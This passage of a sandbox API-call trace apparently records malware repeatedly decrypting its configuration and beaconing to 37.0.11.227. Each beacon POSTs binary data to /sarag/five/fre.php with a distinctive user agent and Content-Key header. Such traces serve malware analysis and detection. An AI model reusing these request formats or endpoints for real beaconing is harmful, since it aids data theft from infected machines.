pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0295.277] GetProcessHeap () returned 0x690000 [0295.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0295.277] socket (af=2, type=1, protocol=6) returned 0x988 [0295.277] connect (s=0x988, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0295.306] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0295.306] GetProcessHeap () returned 0x690000 [0295.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0295.306] GetProcessHeap () returned 0x690000 [0295.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0295.307] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.308] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0295.308] GetProcessHeap () returned 0x690000 [0295.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0295.308] GetProcessHeap () returned 0x690000 [0295.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.309] GetProcessHeap () returned 0x690000 [0295.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0295.309] GetProcessHeap () returned 0x690000 [0295.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0295.309] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.310] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0295.310] GetProcessHeap () returned 0x690000 [0295.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0295.310] GetProcessHeap () returned 0x690000 [0295.311] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.311] send (s=0x988, buf=0x6ad508*, len=242, flags=0) returned 242 [0295.312] send (s=0x988, buf=0x6aba40*, len=159, flags=0) returned 159 [0295.312] GetProcessHeap () returned 0x690000 [0295.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0295.312] recv (in: s=0x988, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0295.397] GetProcessHeap () returned 0x690000 [0295.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0295.397] GetProcessHeap () returned 0x690000 [0295.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0295.398] GetProcessHeap () returned 0x690000 [0295.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0295.399] GetProcessHeap () returned 0x690000 [0295.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0295.400] closesocket (s=0x988) returned 0 [0295.407] GetProcessHeap () returned 0x690000 [0295.407] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0295.407] GetProcessHeap () returned 0x690000 [0295.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.408] GetProcessHeap () returned 0x690000 [0295.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0295.409] GetProcessHeap () returned 0x690000 [0295.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0295.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbec) returned 0x988 [0295.418] Sleep (dwMilliseconds=0xea60) [0295.419] GetProcessHeap () returned 0x690000 [0295.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0295.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.421] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0295.458] GetProcessHeap () returned 0x690000 [0295.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0295.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.461] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.463] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.464] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.464] GetProcessHeap () returned 0x690000 [0295.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0295.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.466] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0295.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.468] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.469] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0295.472] GetProcessHeap () returned 0x690000 [0295.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.474] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.475] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.476] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.477] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.477] GetProcessHeap () returned 0x690000 [0295.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0295.477] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.478] GetProcessHeap () returned 0x690000 [0295.478] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0295.478] GetProcessHeap () returned 0x690000 [0295.478] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.478] GetProcessHeap () returned 0x690000 [0295.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0295.479] GetProcessHeap () returned 0x690000 [0295.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0295.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.480] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0295.495] GetProcessHeap () returned 0x690000 [0295.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0295.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.497] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.498] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.499] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.499] GetProcessHeap () returned 0x690000 [0295.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0295.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.501] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0295.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.502] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.506] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0295.506] GetProcessHeap () returned 0x690000 [0295.506] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.507] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0295.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.508] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0295.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.509] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0295.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.510] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0295.510] GetProcessHeap () returned 0x690000 [0295.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0295.511] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0295.511] GetProcessHeap () returned 0x690000 [0295.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0295.511] socket (af=2, type=1, protocol=6) returned 0x98c [0295.511] connect (s=0x98c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0295.541] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0295.541] GetProcessHeap () returned 0x690000 [0295.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0295.541] GetProcessHeap () returned 0x690000 [0295.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0295.542] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.543] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0295.543] GetProcessHeap () returned 0x690000 [0295.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0295.543] GetProcessHeap () returned 0x690000 [0295.543] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.543] GetProcessHeap () returned 0x690000 [0295.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0295.544] GetProcessHeap () returned 0x690000 [0295.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0295.544] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.545] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0295.546] GetProcessHeap () returned 0x690000 [0295.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0295.546] GetProcessHeap () returned 0x690000 [0295.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.546] send (s=0x98c, buf=0x6ad508*, len=242, flags=0) returned 242 [0295.547] send (s=0x98c, buf=0x6aba40*, len=159, flags=0) returned 159 [0295.547] GetProcessHeap () returned 0x690000 [0295.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0295.547] recv (in: s=0x98c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0295.614] GetProcessHeap () returned 0x690000 [0295.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0295.615] GetProcessHeap () returned 0x690000 [0295.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0295.615] GetProcessHeap () returned 0x690000 [0295.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0295.615] GetProcessHeap () returned 0x690000 [0295.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0295.625] closesocket (s=0x98c) returned 0 [0295.626] GetProcessHeap () returned 0x690000 [0295.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0295.626] GetProcessHeap () returned 0x690000 [0295.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.627] GetProcessHeap () returned 0x690000 [0295.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0295.627] GetProcessHeap () returned 0x690000 [0295.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0295.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5d4) returned 0x98c [0295.630] Sleep (dwMilliseconds=0xea60) [0295.631] GetProcessHeap () returned 0x690000 [0295.631] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0295.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.633] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.656] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0295.669] GetProcessHeap () returned 0x690000 [0295.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0295.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.670] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.671] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.673] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.673] GetProcessHeap () returned 0x690000 [0295.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0295.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.675] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0295.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.676] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.678] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0295.678] GetProcessHeap () returned 0x690000 [0295.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.680] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.694] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.695] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.697] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.697] GetProcessHeap () returned 0x690000 [0295.697] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0295.697] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.698] GetProcessHeap () returned 0x690000 [0295.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0295.699] GetProcessHeap () returned 0x690000 [0295.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.699] GetProcessHeap () returned 0x690000 [0295.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0295.700] GetProcessHeap () returned 0x690000 [0295.700] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0295.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.701] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.711] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0295.735] GetProcessHeap () returned 0x690000 [0295.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0295.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.737] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.738] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.740] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.740] GetProcessHeap () returned 0x690000 [0295.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0295.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.742] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0295.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.743] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.744] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0295.744] GetProcessHeap () returned 0x690000 [0295.744] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.746] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0295.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.747] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0295.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.749] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0295.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.750] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0295.750] GetProcessHeap () returned 0x690000 [0295.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0295.750] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0295.751] GetProcessHeap () returned 0x690000 [0295.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0295.751] socket (af=2, type=1, protocol=6) returned 0x990 [0295.751] connect (s=0x990, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0295.781] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0295.781] GetProcessHeap () returned 0x690000 [0295.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0295.781] GetProcessHeap () returned 0x690000 [0295.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0295.782] LoadLibraryW (lpLibFileName="user32") returned 